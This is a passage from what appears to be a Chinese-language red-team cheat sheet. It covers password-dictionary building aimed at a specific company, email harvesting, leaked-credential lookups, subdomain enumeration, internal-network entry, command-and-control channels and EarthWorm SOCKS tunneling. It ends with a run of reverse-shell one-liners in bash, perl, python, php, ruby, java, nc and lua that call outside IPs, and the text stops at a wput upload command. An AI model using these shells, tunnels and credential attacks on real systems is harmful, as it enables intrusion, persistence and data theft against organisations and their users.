<h2 id="&#x521B;&#x5EFA;&#x4F01;&#x4E1A;&#x5BC6;&#x7801;&#x5B57;&#x5178;"><a name="&#x521B;&#x5EFA;&#x4F01;&#x4E1A;&#x5BC6;&#x7801;&#x5B57;&#x5178;" class="anchor-navigation-ex-anchor" href="#&#x521B;&#x5EFA;&#x4F01;&#x4E1A;&#x5BC6;&#x7801;&#x5B57;&#x5178;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x521B;&#x5EFA;&#x4F01;&#x4E1A;&#x5BC6;&#x7801;&#x5B57;&#x5178;</h2>
<h3 id="&#x5B57;&#x5178;&#x5217;&#x8868;"><a name="&#x5B57;&#x5178;&#x5217;&#x8868;" class="anchor-navigation-ex-anchor" href="#&#x5B57;&#x5178;&#x5217;&#x8868;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x5B57;&#x5178;&#x5217;&#x8868;</h3>
<ul>
<li>passwordlist:<a href="https://github.com/lavalamp-/password-lists" target="_blank">https://github.com/lavalamp-/password-lists</a></li>
<li>&#x732A;&#x732A;&#x4FA0;&#x5B57;&#x5178;:<a href="https://pan.baidu.com/s/1dFJyedz" target="_blank">https://pan.baidu.com/s/1dFJyedz</a>
<a href="https://github.com/rootphantomer/Blasting_dictionary" target="_blank">Blasting_dictionary</a>&#xFF08;&#x5206;&#x4EAB;&#x548C;&#x6536;&#x96C6;&#x5404;&#x79CD;&#x5B57;&#x5178;&#xFF0C;&#x5305;&#x62EC;&#x5F31;&#x53E3;&#x4EE4;&#xFF0C;&#x5E38;&#x7528;&#x5BC6;&#x7801;&#xFF0C;&#x76EE;&#x5F55;&#x7206;&#x7834;&#x3002;&#x6570;&#x636E;&#x5E93;&#x7206;&#x7834;&#xFF0C;&#x7F16;&#x8F91;&#x5668;&#x7206;&#x7834;&#xFF0C;&#x540E;&#x53F0;&#x7206;&#x7834;&#x7B49;&#xFF09; </li>
<li>&#x9488;&#x5BF9;&#x7279;&#x5B9A;&#x7684;&#x5382;&#x5546;&#xFF0C;&#x91CD;&#x70B9;&#x6784;&#x9020;&#x5382;&#x5546;&#x76F8;&#x5173;&#x57DF;&#x540D;&#x7684;&#x5B57;&#x5178;<pre class="language-"><code>[&apos;%pwd%123&apos;,&apos;%user%123&apos;,&apos;%user%521&apos;,&apos;%user%2017&apos;,&apos;%pwd%321&apos;,&apos;%pwd%521&apos;,&apos;%user%321&apos;,&apos;%pwd%123!&apos;,&apos;%pwd%123!@#&apos;,&apos;%pwd%1234&apos;,&apos;%user%2016&apos;,&apos;%user%123$%^&apos;,&apos;%user%123!@#&apos;,&apos;%pwd%2016&apos;,&apos;%pwd%2017&apos;,&apos;%pwd%1!&apos;,&apos;%pwd%2@&apos;,&apos;%pwd%3#&apos;,&apos;%pwd%123#@!&apos;,&apos;%pwd%12345&apos;,&apos;%pwd%123$%^&apos;,&apos;%pwd%!@#456&apos;,&apos;%pwd%123qwe&apos;,&apos;%pwd%qwe123&apos;,&apos;%pwd%qwe&apos;,&apos;%pwd%123456&apos;,&apos;%user%123#@!&apos;,&apos;%user%!@#456&apos;,&apos;%user%1234&apos;,&apos;%user%12345&apos;,&apos;%user%123456&apos;,&apos;%user%123!&apos;]
</code></pre></li>
</ul>
<h3 id="&#x5BC6;&#x7801;&#x751F;&#x6210;"><a name="&#x5BC6;&#x7801;&#x751F;&#x6210;" class="anchor-navigation-ex-anchor" href="#&#x5BC6;&#x7801;&#x751F;&#x6210;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x5BC6;&#x7801;&#x751F;&#x6210;</h3>
<ul>
<li>GenpAss&#xFF08;&#x4E2D;&#x56FD;&#x7279;&#x8272;&#x7684;&#x5F31;&#x53E3;&#x4EE4;&#x751F;&#x6210;&#x5668;: <a href="https://github.com/RicterZ/genpAss/" target="_blank">https://github.com/RicterZ/genpAss/</a></li>
<li>passmaker&#xFF08;&#x53EF;&#x4EE5;&#x81EA;&#x5B9A;&#x4E49;&#x89C4;&#x5219;&#x7684;&#x5BC6;&#x7801;&#x5B57;&#x5178;&#x751F;&#x6210;&#x5668;&#xFF09; &#xFF1A;<a href="https://github.com/bit4woo/passmaker" target="_blank">https://github.com/bit4woo/passmaker</a></li>
<li>pydictor&#xFF08;&#x5F3A;&#x5927;&#x7684;&#x5BC6;&#x7801;&#x751F;&#x6210;&#x5668;&#xFF09; &#xFF1A;<a href="https://github.com/LandGrey/pydictor" target="_blank">https://github.com/LandGrey/pydictor</a></li>
</ul>
<h3 id="&#x90AE;&#x7BB1;&#x5217;&#x8868;&#x83B7;&#x53D6;"><a name="&#x90AE;&#x7BB1;&#x5217;&#x8868;&#x83B7;&#x53D6;" class="anchor-navigation-ex-anchor" href="#&#x90AE;&#x7BB1;&#x5217;&#x8868;&#x83B7;&#x53D6;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x90AE;&#x7BB1;&#x5217;&#x8868;&#x83B7;&#x53D6;</h3>
<ul>
<li>theHarvester &#xFF1A;<a href="https://github.com/laramies/theHarvester" target="_blank">https://github.com/laramies/theHarvester</a></li>
<li>&#x83B7;&#x53D6;&#x4E00;&#x4E2A;&#x90AE;&#x7BB1;&#x4EE5;&#x540E;&#x5BFC;&#x51FA;&#x901A;&#x8BAF;&#x5F55; </li>
<li>LinkedInt :<a href="https://github.com/mdsecactivebreach/LinkedInt" target="_blank">https://github.com/mdsecactivebreach/LinkedInt</a></li>
<li>Mailget&#xFF1A;<a href="https://github.com/Ridter/Mailget" target="_blank">https://github.com/Ridter/Mailget</a></li>
</ul>
<h3 id="&#x6CC4;&#x9732;&#x5BC6;&#x7801;&#x67E5;&#x8BE2;"><a name="&#x6CC4;&#x9732;&#x5BC6;&#x7801;&#x67E5;&#x8BE2;" class="anchor-navigation-ex-anchor" href="#&#x6CC4;&#x9732;&#x5BC6;&#x7801;&#x67E5;&#x8BE2;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x6CC4;&#x9732;&#x5BC6;&#x7801;&#x67E5;&#x8BE2;</h3>
<ul>
<li>ghostproject: <a href="https://ghostproject.fr/" target="_blank">https://ghostproject.fr/</a></li>
<li>pwndb: <a href="https://pwndb2am4tzkvold.onion.to/" target="_blank">https://pwndb2am4tzkvold.onion.to/</a></li>
</ul>
<h3 id="&#x5BF9;&#x4F01;&#x4E1A;&#x5916;&#x90E8;&#x76F8;&#x5173;&#x4FE1;&#x606F;&#x8FDB;&#x884C;&#x641C;&#x96C6;"><a name="&#x5BF9;&#x4F01;&#x4E1A;&#x5916;&#x90E8;&#x76F8;&#x5173;&#x4FE1;&#x606F;&#x8FDB;&#x884C;&#x641C;&#x96C6;" class="anchor-navigation-ex-anchor" href="#&#x5BF9;&#x4F01;&#x4E1A;&#x5916;&#x90E8;&#x76F8;&#x5173;&#x4FE1;&#x606F;&#x8FDB;&#x884C;&#x641C;&#x96C6;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x5BF9;&#x4F01;&#x4E1A;&#x5916;&#x90E8;&#x76F8;&#x5173;&#x4FE1;&#x606F;&#x8FDB;&#x884C;&#x641C;&#x96C6;</h3>
<h4 id="&#x5B50;&#x57DF;&#x540D;&#x83B7;&#x53D6;"><a name="&#x5B50;&#x57DF;&#x540D;&#x83B7;&#x53D6;" class="anchor-navigation-ex-anchor" href="#&#x5B50;&#x57DF;&#x540D;&#x83B7;&#x53D6;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x5B50;&#x57DF;&#x540D;&#x83B7;&#x53D6;</h4>
<ul>
<li>Layer&#x5B50;&#x57DF;&#x540D;&#x6316;&#x6398;&#x673A;4.2&#x7EAA;&#x5FF5;&#x7248; </li>
<li>subDomainsBrute &#xFF1A;<a href="https://github.com/lijiejie/subDomainsBrute" target="_blank">https://github.com/lijiejie/subDomainsBrute</a></li>
<li>wydomain &#xFF1A;<a href="https://github.com/ring04h/wydomain" target="_blank">https://github.com/ring04h/wydomain</a></li>
<li>Sublist3r &#xFF1A;<a href="https://github.com/aboul3la/Sublist3r" target="_blank">https://github.com/aboul3la/Sublist3r</a></li>
<li>site:target.com:<a href="https://www.google.com" target="_blank">https://www.google.com</a></li>
<li>Github&#x4EE3;&#x7801;&#x4ED3;&#x5E93; </li>
<li>&#x6293;&#x5305;&#x5206;&#x6790;&#x8BF7;&#x6C42;&#x8FD4;&#x56DE;&#x503C;(&#x8DF3;&#x8F6C;/&#x6587;&#x4EF6;&#x4E0A;&#x4F20;/app/api&#x63A5;&#x53E3;&#x7B49;) </li>
<li>&#x7AD9;&#x957F;&#x5E2E;&#x624B;links&#x7B49;&#x5728;&#x7EBF;&#x67E5;&#x8BE2;&#x7F51;&#x7AD9; </li>
<li>&#x57DF;&#x4F20;&#x9001;&#x6F0F;&#x6D1E; </li>
</ul>
<p>Linux</p>
<pre class="language-"><code>dig @ns.example.com example=.com AXFR
</code></pre><p>Windows</p>
<pre class="language-"><code>nslookup -type=ns xxx.yyy.cn #&#x67E5;&#x8BE2;&#x89E3;&#x6790;&#x67D0;&#x57DF;&#x540D;&#x7684;DNS&#x670D;&#x52A1;&#x5668;
nslookup #&#x8FDB;&#x5165;nslookup&#x4EA4;&#x4E92;&#x6A21;&#x5F0F;
server dns.domian.com #&#x6307;&#x5B9A;dns&#x670D;&#x52A1;&#x5668;
ls xxx.yyy.cn #&#x5217;&#x51FA;&#x57DF;&#x4FE1;&#x606F;
</code></pre><ul>
<li>GetDomainsBySSL.py :<a href="https://note.youdao.com/ynoteshare1/index.html?id=247d97fc1d98b122ef9804906356d47a&amp;type=note#/" target="_blank">https://note.youdao.com/ynoteshare1/index.html?id=247d97fc1d98b122ef9804906356d47a&amp;type=note#/</a></li>
<li>censys.io&#x8BC1;&#x4E66; :<a href="https://censys.io/certificates?q=target.com" target="_blank">https://censys.io/certificates?q=target.com</a></li>
<li>crt.sh&#x8BC1;&#x4E66;&#x67E5;&#x8BE2;:<a href="https://crt.sh/?q=%25.target.com" target="_blank">https://crt.sh/?q=%25.target.com</a></li>
<li>shadon :<a href="https://www.shodan.io/" target="_blank">https://www.shodan.io/</a></li>
<li>zoomeye :<a href="https://www.zoomeye.org/" target="_blank">https://www.zoomeye.org/</a></li>
<li>fofa :<a href="https://fofa.so/" target="_blank">https://fofa.so/</a></li>
<li>censys&#xFF1A;<a href="https://censys.io/" target="_blank">https://censys.io/</a></li>
<li>dnsdb.io :<a href="https://dnsdb.io/zh-cn/search?q=target.com" target="_blank">https://dnsdb.io/zh-cn/search?q=target.com</a></li>
<li>api.hackertarget.com :<a href="http://api.hackertarget.com/reversedns/?q=target.com" target="_blank">http://api.hackertarget.com/reversedns/?q=target.com</a></li>
<li>community.riskiq.com :<a href="https://community.riskiq.com/Search/target.com" target="_blank">https://community.riskiq.com/Search/target.com</a></li>
<li>subdomain3 :<a href="https://github.com/yanxiu0614/subdomain3" target="_blank">https://github.com/yanxiu0614/subdomain3</a></li>
<li>FuzzDomain :<a href="https://github.com/Chora10/FuzzDomain" target="_blank">https://github.com/Chora10/FuzzDomain</a></li>
<li>dnsdumpster.com :<a href="https://dnsdumpster.com/" target="_blank">https://dnsdumpster.com/</a></li>
<li>phpinfo.me :<a href="https://phpinfo.me/domain/" target="_blank">https://phpinfo.me/domain/</a></li>
<li>dns&#x5F00;&#x653E;&#x6570;&#x636E;&#x63A5;&#x53E3; :<a href="https://dns.bufferover.run/dns?q=baidu.com" target="_blank">https://dns.bufferover.run/dns?q=baidu.com</a></li>
</ul>
<h1 id="&#x8FDB;&#x5165;&#x5185;&#x7F51;"><a name="&#x8FDB;&#x5165;&#x5185;&#x7F51;" class="anchor-navigation-ex-anchor" href="#&#x8FDB;&#x5165;&#x5185;&#x7F51;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x8FDB;&#x5165;&#x5185;&#x7F51;</h1>
<h2 id="&#x57FA;&#x4E8E;&#x4F01;&#x4E1A;&#x5F31;&#x8D26;&#x53F7;&#x6F0F;&#x6D1E;"><a name="&#x57FA;&#x4E8E;&#x4F01;&#x4E1A;&#x5F31;&#x8D26;&#x53F7;&#x6F0F;&#x6D1E;" class="anchor-navigation-ex-anchor" href="#&#x57FA;&#x4E8E;&#x4F01;&#x4E1A;&#x5F31;&#x8D26;&#x53F7;&#x6F0F;&#x6D1E;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x57FA;&#x4E8E;&#x4F01;&#x4E1A;&#x5F31;&#x8D26;&#x53F7;&#x6F0F;&#x6D1E;</h2>
<ul>
<li>VPN&#xFF08;&#x901A;&#x8FC7;&#x90AE;&#x7BB1;&#xFF0C;&#x5BC6;&#x7801;&#x7206;&#x7834;&#xFF0C;&#x793E;&#x5DE5;&#x7B49;&#x9014;&#x5F84;&#x83B7;&#x53D6;VPN&#xFF09; </li>
<li>&#x4F01;&#x4E1A;&#x76F8;&#x5173;&#x8FD0;&#x7EF4;&#x7CFB;&#x7EDF;&#xFF08;zabbix&#x7B49;&#xFF09; </li>
</ul>
<h2 id="&#x57FA;&#x4E8E;&#x7CFB;&#x7EDF;&#x6F0F;&#x6D1E;&#x8FDB;&#x5165;"><a name="&#x57FA;&#x4E8E;&#x7CFB;&#x7EDF;&#x6F0F;&#x6D1E;&#x8FDB;&#x5165;" class="anchor-navigation-ex-anchor" href="#&#x57FA;&#x4E8E;&#x7CFB;&#x7EDF;&#x6F0F;&#x6D1E;&#x8FDB;&#x5165;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x57FA;&#x4E8E;&#x7CFB;&#x7EDF;&#x6F0F;&#x6D1E;&#x8FDB;&#x5165;</h2>
<ul>
<li>Metasploit(&#x6F0F;&#x6D1E;&#x5229;&#x7528;&#x6846;&#x67B6;):<a href="https://github.com/rapid7/metasploit-framework" target="_blank">https://github.com/rapid7/metasploit-framework</a> </li>
<li>&#x6F0F;&#x6D1E;&#x5229;&#x7528;&#x811A;&#x672C; </li>
</ul>
<h2 id="&#x7F51;&#x7AD9;&#x5E94;&#x7528;&#x7A0B;&#x5E8F;&#x6E17;&#x900F;"><a name="&#x7F51;&#x7AD9;&#x5E94;&#x7528;&#x7A0B;&#x5E8F;&#x6E17;&#x900F;" class="anchor-navigation-ex-anchor" href="#&#x7F51;&#x7AD9;&#x5E94;&#x7528;&#x7A0B;&#x5E8F;&#x6E17;&#x900F;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x7F51;&#x7AD9;&#x5E94;&#x7528;&#x7A0B;&#x5E8F;&#x6E17;&#x900F;</h2>
<ul>
<li>SQL&#x6CE8;&#x5165; </li>
<li>&#x8DE8;&#x7AD9;&#x811A;&#x672C;&#xFF08;XSS&#xFF09; </li>
<li>&#x8DE8;&#x7AD9;&#x8BF7;&#x6C42;&#x4F2A;&#x9020;&#xFF08;CSRF&#xFF09; </li>
<li>SSRF&#xFF08;<a href="https://github.com/bcoles/ssrf_proxy" target="_blank">ssrf_proxy</a>&#xFF09; </li>
<li>&#x529F;&#x80FD;/&#x4E1A;&#x52A1;&#x903B;&#x8F91;&#x6F0F;&#x6D1E; </li>
<li>&#x5176;&#x4ED6;&#x6F0F;&#x6D1E;&#x7B49; </li>
<li>CMS-&#x5185;&#x5BB9;&#x7BA1;&#x7406;&#x7CFB;&#x7EDF;&#x6F0F;&#x6D1E; </li>
<li>&#x4F01;&#x4E1A;&#x81EA;&#x5EFA;&#x4EE3;&#x7406; </li>
</ul>
<h2 id="&#x65E0;&#x7EBF;wi-fi&#x63A5;&#x5165;"><a name="&#x65E0;&#x7EBF;wi-fi&#x63A5;&#x5165;" class="anchor-navigation-ex-anchor" href="#&#x65E0;&#x7EBF;wi-fi&#x63A5;&#x5165;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x65E0;&#x7EBF;Wi-Fi&#x63A5;&#x5165;</h2>
<h1 id="&#x9690;&#x533F;&#x653B;&#x51FB;"><a name="&#x9690;&#x533F;&#x653B;&#x51FB;" class="anchor-navigation-ex-anchor" href="#&#x9690;&#x533F;&#x653B;&#x51FB;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x9690;&#x533F;&#x653B;&#x51FB;</h1>
<h2 id="command-and-control"><a name="command-and-control" class="anchor-navigation-ex-anchor" href="#command-and-control"><i class="fa fa-link" aria-hidden="true"></i></a>Command and Control</h2>
<ul>
<li>ICMP :<a href="https://pentestlab.blog/2017/07/28/command-and-control-icmp/" target="_blank">https://pentestlab.blog/2017/07/28/command-and-control-icmp/</a></li>
<li>DNS :<a href="https://pentestlab.blog/2017/09/06/command-and-control-dns/" target="_blank">https://pentestlab.blog/2017/09/06/command-and-control-dns/</a></li>
<li>DropBox :<a href="https://pentestlab.blog/2017/08/29/command-and-control-dropbox/" target="_blank">https://pentestlab.blog/2017/08/29/command-and-control-dropbox/</a></li>
<li>Gmail :<a href="https://pentestlab.blog/2017/08/03/command-and-control-gmail/" target="_blank">https://pentestlab.blog/2017/08/03/command-and-control-gmail/</a></li>
<li>Telegram :<a href="http://drops.xmd5.com/static/drops/tips-16142.html" target="_blank">http://drops.xmd5.com/static/drops/tips-16142.html</a></li>
<li>Twitter :<a href="https://pentestlab.blog/2017/09/26/command-and-control-twitter/" target="_blank">https://pentestlab.blog/2017/09/26/command-and-control-twitter/</a></li>
<li>Website Keyword :<a href="https://pentestlab.blog/2017/09/14/command-and-control-website-keyword/" target="_blank">https://pentestlab.blog/2017/09/14/command-and-control-website-keyword/</a></li>
<li>PowerShell :<a href="https://pentestlab.blog/2017/08/19/command-and-control-powershell/" target="_blank">https://pentestlab.blog/2017/08/19/command-and-control-powershell/</a></li>
<li>Windows COM :<a href="https://pentestlab.blog/2017/09/01/command-and-control-windows-com/" target="_blank">https://pentestlab.blog/2017/09/01/command-and-control-windows-com/</a></li>
<li>WebDAV :<a href="https://pentestlab.blog/2017/09/12/command-and-control-webdav/" target="_blank">https://pentestlab.blog/2017/09/12/command-and-control-webdav/</a></li>
<li>Office 365 :<a href="https://www.anquanke.com/post/id/86974" target="_blank">https://www.anquanke.com/post/id/86974</a></li>
<li>HTTPS :<a href="https://pentestlab.blog/2017/10/04/command-and-control-https/" target="_blank">https://pentestlab.blog/2017/10/04/command-and-control-https/</a></li>
<li>Kernel :<a href="https://pentestlab.blog/2017/10/02/command-and-control-kernel/" target="_blank">https://pentestlab.blog/2017/10/02/command-and-control-kernel/</a></li>
<li>Website :<a href="https://pentestlab.blog/2017/11/14/command-and-control-website/" target="_blank">https://pentestlab.blog/2017/11/14/command-and-control-website/</a></li>
<li>WMI :<a href="https://pentestlab.blog/2017/11/20/command-and-control-wmi/" target="_blank">https://pentestlab.blog/2017/11/20/command-and-control-wmi/</a></li>
<li>WebSocket :<a href="https://pentestlab.blog/2017/12/06/command-and-control-websocket/" target="_blank">https://pentestlab.blog/2017/12/06/command-and-control-websocket/</a></li>
<li>Images :<a href="https://pentestlab.blog/2018/01/02/command-and-control-images/" target="_blank">https://pentestlab.blog/2018/01/02/command-and-control-images/</a></li>
<li>Web Interface :<a href="https://pentestlab.blog/2018/01/03/command-and-control-web-interface/" target="_blank">https://pentestlab.blog/2018/01/03/command-and-control-web-interface/</a></li>
<li>JavaScript :<a href="https://pentestlab.blog/2018/01/08/command-and-control-javascript/" target="_blank">https://pentestlab.blog/2018/01/08/command-and-control-javascript/</a></li>
<li>... </li>
</ul>
<h2 id="fronting"><a name="fronting" class="anchor-navigation-ex-anchor" href="#fronting"><i class="fa fa-link" aria-hidden="true"></i></a>Fronting</h2>
<ul>
<li><a href="https://evi1cg.me/archives/Domain_Fronting.html" target="_blank">Domain Fronting </a></li>
<li><a href="https://evi1cg.me/archives/Tor_Fronting.html" target="_blank">Tor_Fronting.</a></li>
</ul>
<h2 id="&#x4EE3;&#x7406;"><a name="&#x4EE3;&#x7406;" class="anchor-navigation-ex-anchor" href="#&#x4EE3;&#x7406;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x4EE3;&#x7406;</h2>
<ul>
<li>VPN </li>
<li>shadowsockts :<a href="https://github.com/shadowsocks" target="_blank">https://github.com/shadowsocks</a></li>
<li>HTTP :<a href="http://cn-proxy.com/" target="_blank">http://cn-proxy.com/</a></li>
<li>Tor </li>
</ul>
<h1 id="&#x5185;&#x7F51;&#x8DE8;&#x8FB9;&#x754C;&#x5E94;&#x7528;"><a name="&#x5185;&#x7F51;&#x8DE8;&#x8FB9;&#x754C;&#x5E94;&#x7528;" class="anchor-navigation-ex-anchor" href="#&#x5185;&#x7F51;&#x8DE8;&#x8FB9;&#x754C;&#x5E94;&#x7528;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x5185;&#x7F51;&#x8DE8;&#x8FB9;&#x754C;&#x5E94;&#x7528;</h1>
<h2 id="&#x5185;&#x7F51;&#x8DE8;&#x8FB9;&#x754C;&#x8F6C;&#x53D1;"><a name="&#x5185;&#x7F51;&#x8DE8;&#x8FB9;&#x754C;&#x8F6C;&#x53D1;" class="anchor-navigation-ex-anchor" href="#&#x5185;&#x7F51;&#x8DE8;&#x8FB9;&#x754C;&#x8F6C;&#x53D1;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x5185;&#x7F51;&#x8DE8;&#x8FB9;&#x754C;&#x8F6C;&#x53D1;</h2>
<ul>
<li><a href="https://blog.csdn.net/l_f0rm4t3d/article/details/24004555" target="_blank">NC&#x7AEF;&#x53E3;&#x8F6C;&#x53D1;</a> </li>
<li><a href="http://blog.chinaunix.net/uid-53401-id-4407931.html" target="_blank">LCX&#x7AEF;&#x53E3;&#x8F6C;&#x53D1; </a></li>
<li><a href="https://github.com/cnlh/nps" target="_blank">nps</a></li>
<li>&#x4EE3;&#x7406;&#x811A;&#x672C; <ol>
<li><a href="https://github.com/SECFORCE/Tunna" target="_blank">Tunna </a></li>
<li><a href="https://github.com/sensepost/reDuh" target="_blank">Reduh </a></li>
</ol>
</li>
<li>... </li>
</ul>
<h2 id="&#x5185;&#x7F51;&#x8DE8;&#x8FB9;&#x754C;&#x4EE3;&#x7406;&#x7A7F;&#x900F;"><a name="&#x5185;&#x7F51;&#x8DE8;&#x8FB9;&#x754C;&#x4EE3;&#x7406;&#x7A7F;&#x900F;" class="anchor-navigation-ex-anchor" href="#&#x5185;&#x7F51;&#x8DE8;&#x8FB9;&#x754C;&#x4EE3;&#x7406;&#x7A7F;&#x900F;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x5185;&#x7F51;&#x8DE8;&#x8FB9;&#x754C;&#x4EE3;&#x7406;&#x7A7F;&#x900F;</h2>
<h3 id="ew"><a name="ew" class="anchor-navigation-ex-anchor" href="#ew"><i class="fa fa-link" aria-hidden="true"></i></a><a href="https://rootkiter.com/EarthWorm/" target="_blank">EW</a></h3>
<p>&#x6B63;&#x5411; SOCKS v5 &#x670D;&#x52A1;&#x5668;:</p>
<pre class="language-"><code>./ew -s ssocksd -l 1080
</code></pre><p> &#x53CD;&#x5F39; SOCKS v5 &#x670D;&#x52A1;&#x5668;:
a) &#x5148;&#x5728;&#x4E00;&#x53F0;&#x5177;&#x6709;&#x516C;&#x7F51; ip &#x7684;&#x4E3B;&#x673A;A&#x4E0A;&#x8FD0;&#x884C;&#x4EE5;&#x4E0B;&#x547D;&#x4EE4;&#xFF1A;</p>
<pre class="language-"><code>$ ./ew -s rcsocks -l 1080 -e 8888
</code></pre><p>b) &#x5728;&#x76EE;&#x6807;&#x4E3B;&#x673A;B&#x4E0A;&#x542F;&#x52A8; SOCKS v5 &#x670D;&#x52A1; &#x5E76;&#x53CD;&#x5F39;&#x5230;&#x516C;&#x7F51;&#x4E3B;&#x673A;&#x7684; 8888&#x7AEF;&#x53E3;</p>
<pre class="language-"><code>$ ./ew -s rssocks -d 1.1.1.1 -e 8888
</code></pre><p>&#x591A;&#x7EA7;&#x7EA7;&#x8054;</p>
<pre class="language-"><code>$ ./ew -s lcx_listen -l 1080 -e 8888
$ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999
$ ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999
</code></pre><p>lcx_tran &#x7684;&#x7528;&#x6CD5;</p>
<pre class="language-"><code>$ ./ew -s ssocksd -l 9999
$ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999
</code></pre><p>lcx_listen&#x3001;lcx_slave &#x7684;&#x7528;&#x6CD5;</p>
<pre class="language-"><code>$ ./ew -s lcx_listen -l 1080 -e 8888
$ ./ew -s ssocksd -l 9999
$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
</code></pre><p>&#x201C;&#x4E09;&#x7EA7;&#x7EA7;&#x8054;&#x201D;&#x7684;&#x672C;&#x5730;SOCKS&#x6D4B;&#x8BD5;&#x7528;&#x4F8B;&#x4EE5;&#x4F9B;&#x53C2;&#x8003;</p>
<pre class="language-"><code>$ ./ew -s rcsocks -l 1080 -e 8888
$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
$ ./ew -s lcx_listen -l 9999 -e 7777
$ ./ew -s rssocks -d 127.0.0.1 -e 7777
</code></pre><h3 id="termite"><a name="termite" class="anchor-navigation-ex-anchor" href="#termite"><i class="fa fa-link" aria-hidden="true"></i></a><a href="https://rootkiter.com/Termite/" target="_blank">Termite</a></h3>
<p>&#x4F7F;&#x7528;&#x8BF4;&#x660E;:<a href="https://rootkiter.com/Termite/README.txt" target="_blank">https://rootkiter.com/Termite/README.txt</a> </p>
<h3 id="&#x4EE3;&#x7406;&#x811A;&#x672C;"><a name="&#x4EE3;&#x7406;&#x811A;&#x672C;" class="anchor-navigation-ex-anchor" href="#&#x4EE3;&#x7406;&#x811A;&#x672C;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x4EE3;&#x7406;&#x811A;&#x672C;</h3>
<p>reGeorg :<a href="https://github.com/sensepost/reGeorg" target="_blank">https://github.com/sensepost/reGeorg</a></p>
<h2 id="shell&#x53CD;&#x5F39;"><a name="shell&#x53CD;&#x5F39;" class="anchor-navigation-ex-anchor" href="#shell&#x53CD;&#x5F39;"><i class="fa fa-link" aria-hidden="true"></i></a>shell&#x53CD;&#x5F39;</h2>
<p>bash  </p>
<pre class="language-"><code>bash -i &gt;&amp; /dev/tcp/10.0.0.1/8080 0&gt;&amp;1
</code></pre><p>perl </p>
<pre class="language-"><code>perl -e &apos;use Socket;$i=&quot;10.0.0.1&quot;;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(&quot;tcp&quot;));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,&quot;&gt;&amp;S&quot;);open(STDOUT,&quot;&gt;&amp;S&quot;);open(STDERR,&quot;&gt;&amp;S&quot;);exec(&quot;/bin/sh -i&quot;);};&apos;
</code></pre><p>python </p>
<pre class="language-"><code>python -c &apos;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;10.0.0.1&quot;,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&quot;/bin/sh&quot;,&quot;-i&quot;]);&apos;
</code></pre><p>php </p>
<pre class="language-"><code>php -r &apos;$sock=fsockopen(&quot;10.0.0.1&quot;,1234);exec(&quot;/bin/sh -i <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>&amp;3</span> <span class="token punctuation">&gt;</span></span>&amp;3 2&gt;&amp;3&quot;);&apos;
</code></pre><p>ruby </p>
<pre class="language-"><code>ruby -rsocket -e&apos;f=TCPSocket.open(&quot;10.0.0.1&quot;,1234).to_i;exec sprintf(&quot;/bin/sh -i &lt;&amp;%d &gt;&amp;%d 2&gt;&amp;%d&quot;,f,f,f)&apos;
</code></pre><p>java </p>
<pre class="language-"><code>r = Runtime.getRuntime()
p = r.exec([&quot;/bin/bash&quot;,&quot;-c&quot;,&quot;exec 5&lt;&gt;/dev/tcp/10.0.0.1/2002;cat <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>&amp;5</span> <span class="token attr-name">|</span> <span class="token attr-name">while</span> <span class="token attr-name">read</span> <span class="token attr-name">line;</span> <span class="token attr-name">do</span> <span class="token attr-name">\$line</span> <span class="token attr-name">2</span><span class="token punctuation">&gt;</span></span>&amp;5 &gt;<span class="token entity" title="&amp;5;">&amp;5;</span> done&quot;] as String[])
p.waitFor()
</code></pre><p>nc </p>
<pre class="language-"><code>#&#x4F7F;&#x7528;-e 
nc -e /bin/sh 223.8.200.234 1234
</code></pre><pre class="language-"><code>#&#x4E0D;&#x4F7F;&#x7528;-e
mknod /tmp/backpipe p
/bin/sh 0/tmp/backpipe | nc attackerip listenport 1&gt;/tmp/backpipe
</code></pre><p>lua </p>
<pre class="language-"><code>lua -e &quot;require(&apos;socket&apos;);require(&apos;os&apos;);t=socket.tcp();t:connect(&apos;202.103.243.122&apos;,&apos;1234&apos;);os.execute(&apos;/bin/sh -i <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>&amp;3</span> <span class="token punctuation">&gt;</span></span>&amp;3 2&gt;&amp;3&apos;);&quot;
</code></pre><h2 id="&#x5185;&#x7F51;&#x6587;&#x4EF6;&#x7684;&#x4F20;&#x8F93;&#x548C;&#x4E0B;&#x8F7D;"><a name="&#x5185;&#x7F51;&#x6587;&#x4EF6;&#x7684;&#x4F20;&#x8F93;&#x548C;&#x4E0B;&#x8F7D;" class="anchor-navigation-ex-anchor" href="#&#x5185;&#x7F51;&#x6587;&#x4EF6;&#x7684;&#x4F20;&#x8F93;&#x548C;&#x4E0B;&#x8F7D;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x5185;&#x7F51;&#x6587;&#x4EF6;&#x7684;&#x4F20;&#x8F93;&#x548C;&#x4E0B;&#x8F7D;</h2>
<p>wput </p>
<pre class="language-"><code>wput dir_name ftp://linuxpig:123456@host.com/
